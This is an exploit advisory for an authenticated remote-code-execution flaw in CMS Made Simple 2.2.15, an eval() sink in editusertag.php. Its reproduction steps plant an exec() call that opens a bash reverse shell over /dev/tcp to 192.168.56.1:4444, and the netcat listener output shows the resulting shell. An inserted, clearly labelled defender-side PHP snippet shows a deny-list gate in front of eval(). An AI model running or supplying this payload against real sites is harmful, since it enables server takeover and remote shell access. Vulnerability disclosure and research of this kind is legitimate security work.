
# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)
# Author: Andrey Stoykov
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms
# Version: 2.2.15
# Tested on: Debian 10 LAMPP
# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/12/cms-made-simple-2215-authenticated-rce.html

The vulnerability is in "editusertag.php" at line #93, where user-supplied input is passed to PHP's eval() function.

// Vulnerable eval() code

if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {

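As a defender-side illustration added here (not code from CMS Made Simple or from the advisory author), the snippet below shows a defence-in-depth gate that could sit in front of the eval() call above: it tokenizes the submitted User Defined Tag source and refuses it when it names a process-execution function or uses the backtick operator. The udt_* function names, the deny list and the sample inputs are assumptions; because variable functions and reflection can evade any static check, the authoritative controls remain php.ini disable_functions and strictly limited administrator accounts.

```php
<?php
// Added example, not CMS Made Simple code: a static gate in front of the
// eval() sink. The udt_* names and the deny list below are assumptions.

// Functions that hand execution to the operating system.
const UDT_DENIED_FUNCTIONS = [
    'exec', 'shell_exec', 'system', 'passthru', 'popen', 'proc_open', 'pcntl_exec',
];

// PHP 8 tokenizes "\exec" as one T_NAME_FULLY_QUALIFIED token; PHP 7 yields T_STRING.
function udt_name_token_ids(): array
{
    $ids = [T_STRING];
    if (defined('T_NAME_FULLY_QUALIFIED')) {
        $ids[] = constant('T_NAME_FULLY_QUALIFIED');
    }
    return $ids;
}

// Returns one "line: reason" string per finding; an empty array means clean.
function udt_static_check(string $code): array
{
    $findings = [];
    // Prepend an open tag so the body is tokenized as PHP code, which is
    // how the original eval() interprets it. Line numbers shift by one.
    foreach (token_get_all("<?php\n" . $code) as $tok) {
        if ($tok === '`') {                      // backtick is shell_exec shorthand
            $findings[] = 'backtick shell execution operator';
        } elseif (is_array($tok) && in_array($tok[0], udt_name_token_ids(), true)) {
            $name = strtolower(ltrim($tok[1], '\\'));
            if (in_array($name, UDT_DENIED_FUNCTIONS, true)) {
                $findings[] = ($tok[2] - 1) . ': call to ' . $name . '()';
            }
        }
    }
    return $findings;
}

// Hardened counterpart of the vulnerable line: reject before eval() runs.
function udt_define_or_reject(string $code): bool
{
    if (udt_static_check($code) !== []) {
        return false;                            // never reaches eval()
    }
    return eval('function testfunction' . rand() . '() {' . $code . "\n}") !== false;
}

// Constructed sample inputs for a local run: the first is refused, the second is clean.
print_r(udt_static_check('exec("id");'));
print_r(udt_static_check('echo "hello";'));
```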
Reproduction Steps:

1. Log in as an administrator user and navigate to Extensions->User Defined Tags

2. Add code with the payload of:

exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1'");

3. Click on the newly created User Defined Tag and use the Run function

RCE will be achieved:

astoykov@Lubuntu:~$ nc -kvlp 4444
nc: getnameinfo: Temporary failure in name resolution
Connection received on 192.168.56.132 53690
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)